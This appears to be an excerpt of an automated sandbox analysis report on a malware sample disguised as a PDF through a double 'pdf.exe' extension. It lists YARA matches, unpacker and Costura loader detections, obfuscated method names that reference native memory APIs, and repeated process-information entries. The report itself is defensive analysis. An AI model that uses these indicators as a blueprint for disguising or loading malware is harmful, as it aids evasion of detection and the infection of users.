Source: 0.2.1C24TBP_00000143.pdf.exe.1f41046d370.6.raw.unpack, r8DMqxFJWaISmwcNpoC.cs

.Net Code: Type.GetTypeFromHandle(yKI9VtPxMfce22jBaHW.sCoXTWaRgT(16777265)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(yKI9VtPxMfce22jBaHW.sCoXTWaRgT(16777259)),Type.GetTypeFromHandle(yKI9VtPxMfce22jBaHW.sCoXTWaRgT(16777263))})

.NET source code contains potential unpacker

Source: 1C24TBP_00000143.pdf.exe, Epjxpojnncb.cs	.Net Code: Thdebdk System.AppDomain.Load(byte[])
Source: 0.2.1C24TBP_00000143.pdf.exe.1f4108b8ab0.3.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.1C24TBP_00000143.pdf.exe.1f4108b8ab0.3.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.1C24TBP_00000143.pdf.exe.1f4108b8ab0.3.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.1C24TBP_00000143.pdf.exe.1f4108b8ab0.3.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.1C24TBP_00000143.pdf.exe.1f4108b8ab0.3.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
Source: 0.2.1C24TBP_00000143.pdf.exe.1f47a980000.9.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.1C24TBP_00000143.pdf.exe.1f47a980000.9.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.1C24TBP_00000143.pdf.exe.1f47a980000.9.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.1C24TBP_00000143.pdf.exe.1f410b178c0.2.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.1C24TBP_00000143.pdf.exe.1f410b178c0.2.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.1C24TBP_00000143.pdf.exe.1f410b178c0.2.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.1C24TBP_00000143.pdf.exe.1f410b678f8.5.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.1C24TBP_00000143.pdf.exe.1f410b678f8.5.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.1C24TBP_00000143.pdf.exe.1f410b678f8.5.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties

Yara detected Costura Assembly Loader

Source: Yara match	File source: 0.2.1C24TBP_00000143.pdf.exe.1f47b590000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1C24TBP_00000143.pdf.exe.1f41046d370.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1C24TBP_00000143.pdf.exe.1f410356538.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1C24TBP_00000143.pdf.exe.1f41023f6f8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2652297569.000001F47B590000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2630438443.000001F400061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2638682795.000001F410011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 1C24TBP_00000143.pdf.exe PID: 6916, type: MEMORYSTR

Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Code function: 0_2_00007FFD348AC78E push ds; retf	0_2_00007FFD348AC78F
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Code function: 0_2_00007FFD34A7A1CB pushad ; retf	0_2_00007FFD34A7A259
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Code function: 0_2_00007FFD34A7420A push esp; iretd	0_2_00007FFD34A7420B
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00007FFD3498C922 push esp; iretd	4_2_00007FFD3498C923
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00007FFD34977868 push ebx; retf	4_2_00007FFD3497796A

Source: 0.2.1C24TBP_00000143.pdf.exe.1f41046d370.6.raw.unpack, dmZnM5SU86NRPVWAgHy.cs	High entropy of concatenated method names: 'mksS0XVrUa', 'qvMSZ89ciR', 'ptCSjMWfgE', 'PsHSbLT6Pa', 'rAUNAXUTsMjOCjHM6sT', 'HfdHlOUXYQapBmRLInw', 'q4VyTYUl0qyrBKyP6E7', 'XvDUatUfuaTfhsWDLYo', 'qrklo3U6k9ROGrZSAYu', 'USdqBsUk2xs6AdIfgkk'
Source: 0.2.1C24TBP_00000143.pdf.exe.1f41046d370.6.raw.unpack, bRSKECB9cRt3YkMfyPY.cs	High entropy of concatenated method names: 'RtlInitUnicodeString', 'LdrLoadDll', 'RtlZeroMemory', 'NtQueryInformationProcess', 'EQjBynlwlL', 'NtProtectVirtualMemory', 'eATLObccQNUH6SFHoK7', 'yd6NpOcJvpodrdina5X', 'Ygh54hcLoSo8Fgbs3Vq', 'BMeZ3scRRq2ukRx01SN'
Source: 0.2.1C24TBP_00000143.pdf.exe.1f41046d370.6.raw.unpack, OEo143FwaSHuJqeGrvU.cs	High entropy of concatenated method names: 'rdSF9BMSha', 'u97FEjQgIu', 'oVMk8MjuPgeZyGZWDG1', 'UNNgOijCm7crnOHyGMA', 'vf1PW8jwFycxcqtZ5F1', 'GAgRTajvwWaR52Ikvg9', 'n4COoujDyaG6KijXVL8', 'zB5uVrjg4WQTbtQyGZ4', 'wCm5nEj9CBGjMaKS3d6', 'iKnbykjEl1IDmZkjrUE'
Source: 0.2.1C24TBP_00000143.pdf.exe.1f41046d370.6.raw.unpack, QYm9Krv6YnPKwJvNCf.cs	High entropy of concatenated method names: 'N0hCdFpon', 'paFwuRDSP', 'M9b9THluX', 'K9eE4ml8H', 'LbbuCEs3C', 'gTIaWIWeKhMsvdKsyHt', 'XNcAZJWo8VLfjekemi2', 'BiohcCWO5kegZHw37RZ', 'c15yvvWHpYqiZ4puRCo', 'L6IocYWQlr8qhU5I0mA'
Source: 0.2.1C24TBP_00000143.pdf.exe.1f41046d370.6.raw.unpack, AssemblyLoader.cs	High entropy of concatenated method names: 'CultureToString', 'ReadExistingAssembly', 'CopyTo', 'LoadStream', 'LoadStream', 'ReadStream', 'ReadFromEmbeddedResources', 'ResolveAssembly', 'Attach', 'UZg38Zja85owOITVoq5'
Source: 0.2.1C24TBP_00000143.pdf.exe.1f41046d370.6.raw.unpack, xPYH7iFyTmEMfZdELBN.cs	High entropy of concatenated method names: 'OOKF52lyJs', 'Ubp7WRjp4DVXTgNKApO', 'NFGQD1j2xQGEBlf1eSg', 'HHqcITjxTEQf7SXnNi7', 'xB0nqBj4XS3QcMK9nkv', 'YLEP6UjKeIFb9N627Bb', 'DXuksvj53CxUOesqDLX'
Source: 0.2.1C24TBP_00000143.pdf.exe.1f41046d370.6.raw.unpack, uFea7dPLRmv1bXXSecQ.cs	High entropy of concatenated method names: 'JflPTKCm1r', 'jAXPX9OAp6', 'lJAPlfZwM4', 'MeRPfOYE0d', 'Vc1P6OMlS3', 'CAgPkC3Xs2', 'uQHPe5flJy', 'mXYPoG0AZd', 'n6SPOsIYLM', 'UXFPHKFhyw'
Source: 0.2.1C24TBP_00000143.pdf.exe.1f41046d370.6.raw.unpack, X8vJ2fFVASwh2CNN7e7.cs	High entropy of concatenated method names: 'OwOF7UOWiT', 'jpITLLrciZFKTujg7KV', 'PQALgirRY08jsGk4j5w', 'tgQ2kwrUh8EHrGCTXnV', 'nGMrwHrrnnZ0TDAjQsp', 'q9UF6WrjCpREBqSVUkN', 'xqe6M9rbTsU4Km6tvbJ', 'Kk9uh5rJuEDCyZQ696M', 'SBfTfkrLUhT9EoAG0Cf'
Source: 0.2.1C24TBP_00000143.pdf.exe.1f41046d370.6.raw.unpack, NbZFn6iROthtElV3F5G.cs	High entropy of concatenated method names: 'k3EirjPYAF', 'oG0ijvlIDk', 'DORibb8CD3', 'XfHBJWLL6AMZGZXTxue', 'GMAmKaLcU539YwbvPMM', 'qdlO3pLRTscdW7l4N40', 'B1FXO2LdZ2Kspd9qRNZ', 'xdLDybLJFB7HfDrinA0', 'pK6fO6LUxsqyAG3HSSc', 'YhADu0Lrewt9Xb64U5A'
Source: 0.2.1C24TBP_00000143.pdf.exe.1f41046d370.6.raw.unpack, Qi2UasVgAN5sJakLFJw.cs	High entropy of concatenated method names: 'CyCVEojJTo', 'bqYxXPdUCGVpg9H3qPS', 'juU6Z9drncamX00OQM7', 'XesnYhdja7dro5dEnSs', 'vJFerGdb8GNUY4IESgo', 'AvYDqPd0AmlO3LgrNoI', 'BuqWLNdZJW8DyhVtAeY', 'QVNkMTdMtIJq3ElqLZ9', 'kZuJjkda6IQdnKhLLmW', 'LY2lwIdYl3GPoU4mf6V'
Source: 0.2.1C24TBP_00000143.pdf.exe.1f41046d370.6.raw.unpack, DOCj7QPQ0xYL78kUwti.cs	High entropy of concatenated method names: 'dVS9guxeij', 'f4799BVDHt', 'c559EjEcIW', 'J9N9ydBQZP', 'Otu9KiHIhf', 'MSb950p0tC', 'E779pbGYSB', 'WMgvwIGUnS', 'EfH92L3Tjt', 'X4w9xXu1K8'
Source: 0.2.1C24TBP_00000143.pdf.exe.1f41046d370.6.raw.unpack, hZt10fi9Ckuh4cCk4wY.cs	High entropy of concatenated method names: 'GBAiyG8fKL', 'UsmiK46TBn', 'urNqk3J0qEDc2QUaLbI', 'kvDQJgJj2vb2plnAYCY', 'zvuBLpJbckY8oyTiV3g', 'a6pZ7UJZAGnSoySbLS6', 'L5dEwYJM0NfFlVoJxy7', 'YAQdchJaCiFZ1ksb6ad', 'fhH9IGJYGTc0hiKAnDf'
Source: 0.2.1C24TBP_00000143.pdf.exe.1f41046d370.6.raw.unpack, naYbqUFDtpxGgQn8hj5.cs	High entropy of concatenated method names: 'E5oFCuTMt8', 'PiNF7EjiIThXKunW0wk', 'cVFa7UjBjEf1tG5Q2lI', 'k58EU4jIkUkHh7IblaS', 'EHwjyWj8XbArDpwgq5j', 'gH1inpjSFw9Cv6xQ7FG', 'GVVrMnjFaNyhAu5TTG0', 'NQrwf5jtMlXIECy766N', 'nxQQ3LjqhXYWH20t5dO', 'gwQggnj7FEmufFt7wvt'
Source: 0.2.1C24TBP_00000143.pdf.exe.1f41046d370.6.raw.unpack, q0GokRSNSdr2wHk6tsj.cs	High entropy of concatenated method names: 'kh5S3Ixg70', 'hWJSsDihqi', 'iDkFGGdi8M', 'ITmcA8r259sRyPYyUAj', 'RdU7U2rxsMt3bfktncv', 'NNnMnor5oo16gppCNgN', 'K2aQV4rpXIvBKfUkF6r', 'w9mZ8Ur4gHE2JbTd6Jm', 'FXFujPrW3VOPES9SXKo'
Source: 0.2.1C24TBP_00000143.pdf.exe.1f41046d370.6.raw.unpack, kTmScLBA3RmFxQa0lWw.cs	High entropy of concatenated method names: 'BG9BqL4nFq', 'CjwBiiB9Rs', 'FBGBIUYO3R', 'cy5BSjydXX', 'zBTBFUUP4r', 'mirBtS1A8O', 'HtoBP2WXtE', 'K7KBvFyrDv', 'TXYBDsc0aJ', 'MGjBu75KnN'
Source: 0.2.1C24TBP_00000143.pdf.exe.1f41046d370.6.raw.unpack, eqJEaZSg8ZHl02ulZyE.cs	High entropy of concatenated method names: 'OuGSEMNDoe', 'lhZtqPRXvBOF57Snhtq', 'j7vLF8RltT8AQyQra4W', 'J1SIbHRfUtpVnleDpP3', 'OLbeBIR6xCtVJuNPIa6', 'MBaMJrRYZLVTS1qGvk4', 'x7GasiRT2mF8po1AVer'
Source: 0.2.1C24TBP_00000143.pdf.exe.1f41046d370.6.raw.unpack, KLCqrPSLrwESHo9n9NQ.cs	High entropy of concatenated method names: 'Vg0SR7VyLh', 'wZyoB4UcAbCbBj9Lyif', 'hf7wKsURHk97BACK5NZ', 'GDwZqBUUTNNnUYhgTvX', 'PWfdedUrZG1GS9SEnnd', 'AyapvBUjYD6AAtnquwl', 'FVRnQwUbEDL8KCIAAik', 'KVWPSnU0XhxbwsAhv39', 'Wkdt21UZysLFHkr7rwR', 'RA1e3wUJfwkj67qdGr5'
Source: 0.2.1C24TBP_00000143.pdf.exe.1f41046d370.6.raw.unpack, r8DMqxFJWaISmwcNpoC.cs	High entropy of concatenated method names: 't7Mkfobp0vxPBbI8Nvs', 'u5WAE1b26ExuemfIfTZ', 'pHuP7jCvCp', 'B1xICObdYTOaD3vuBIi', 'OGKSssbJS248mF1HvFI', 'hq5rJLbL4M0wfrapers', 'QSaEFQbctRMpDNWTUH9', 'T1djGxbRJVAWwsvhPy5', 'dJ0iMebUU0TLW4pdau9', 'im3WXgbrDDwnE4mX2xy'
Source: 0.2.1C24TBP_00000143.pdf.exe.1f41046d370.6.raw.unpack, PSF3HPS4DnOH5A8woeK.cs	High entropy of concatenated method names: 'sM7Sdni4Dl', 'nASSJTQWl5', 'WlJxMARsKr30qbn2ok7', 'qb13fbRzmcO02aMlgP5', 'odUb6KUG8Xws8mo13nD', 'woq1hZUAwNCji58Ol0Q', 'fuPSEwUVGeHRuVaMRtT', 'gBTBetUqd4xOMyQ98jy', 'aQaGK6U785eGufUtrg5', 'pmPWStUiSZStebNO41S'
Source: 0.2.1C24TBP_00000143.pdf.exe.1f41046d370.6.raw.unpack, OeXKASSOOpgMXJoD2df.cs	High entropy of concatenated method names: 'LOKSQJ1UTY', 'WWWSmdn9HI', 'z1SShTNJtQ', 'gaaFSqr9yQuGa0uDnfi', 'DNMG89rwGcKu0mjHWbk', 'kqamFBrgHeMIsecbM33', 'Y1Cqi8rE8l7ieWV6Twv', 'S4seSuryiLR7GpVUYDQ'
Source: 0.2.1C24TBP_00000143.pdf.exe.1f41046d370.6.raw.unpack, p9UOxbFF22cetBJo9b6.cs	High entropy of concatenated method names: 'WiPFPhLfZg', 'Uh2FvRXZSh', 'VSPW68rfM1241jbo1NW', 'SU9XTvr6uXBeFUlMGX3', 'rQo1wGrX5f1UBn5tFsf', 'AscUsQrlQyoWBqvdwxl', 'kJ6ooTrkIwE0Y18FcVS', 'skSbZ9rem2utn9lid3I', 'e17IXxroS4v76Kc5Ptb', 'nslwETrOTsFSGUxPkHI'
Source: 0.2.1C24TBP_00000143.pdf.exe.1f41046d370.6.raw.unpack, pITnICSYhC4TeUCWKCq.cs	High entropy of concatenated method names: 'e2fSXRnUlV', 'GuAfJcUQSylOue7JpUk', 'OjCkKqUhJuAlnP01My4', 'CEDJDFUm7ptqGHXJnSE', 'MElQ8xU14w2Bv5K8VKG', 'VbLdOjUN8AhlPJHocv1', 'zZ4QAEUncKjwwWaQB7b', 'hSNWSyU30Sj31BoegpI', 'y3UXvlUsmtkouODguDY', 'o8hOIMUzAEvJErihCp9'
Source: 0.2.1C24TBP_00000143.pdf.exe.1f41046d370.6.raw.unpack, mHMfFBixIP40G7bf7Xd.cs	High entropy of concatenated method names: 'qEriWM4xwb', 'qciidARTRU', 'p7aiJcy7Cr', 'eOqiLXBiDL', 'V2Gic6j5eB', 'oriNdbJHUJKanIbpG7E', 'hifGtuJQVy6vFowmqj4', 'eXdqSEJhk1eomB1FeEb', 'geZxDKJm12BXt3jVW7e', 'miktKwJ18LJC4vvyAuY'
Source: 0.2.1C24TBP_00000143.pdf.exe.1f41046d370.6.raw.unpack, W7WWl3puawBVb4ovIu.cs	High entropy of concatenated method names: 'qkBxG1uUk', 'LNO4rAFYO', 'LcudNQP3Z', 'hlKWeoKa0', 'DD0hoAWn812U8OsLZxV', 'NSlYqJW3rvXSNy0iMIj', 'O86thhWsDbInf8IwS74', 'AqgOHjWztZRtYvOG1n9', 'kisy9CdGLr3FYFwkNTR', 'r17DyIdAgrHuJJPLVx0'
Source: 0.2.1C24TBP_00000143.pdf.exe.1f47b470000.10.raw.unpack, bRSKECB9cRt3YkMfyPY.cs	High entropy of concatenated method names: 'RtlInitUnicodeString', 'LdrLoadDll', 'RtlZeroMemory', 'NtQueryInformationProcess', 'EQjBynlwlL', 'NtProtectVirtualMemory', 'eATLObccQNUH6SFHoK7', 'yd6NpOcJvpodrdina5X', 'Ygh54hcLoSo8Fgbs3Vq', 'BMeZ3scRRq2ukRx01SN'

Hooking and other Techniques for Hiding and Protection

Uses an obfuscated file name to hide its real file extension (double extension)

Source: Possible double extension: pdf.exe

Static PE information: 1C24TBP_00000143.pdf.exe

Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
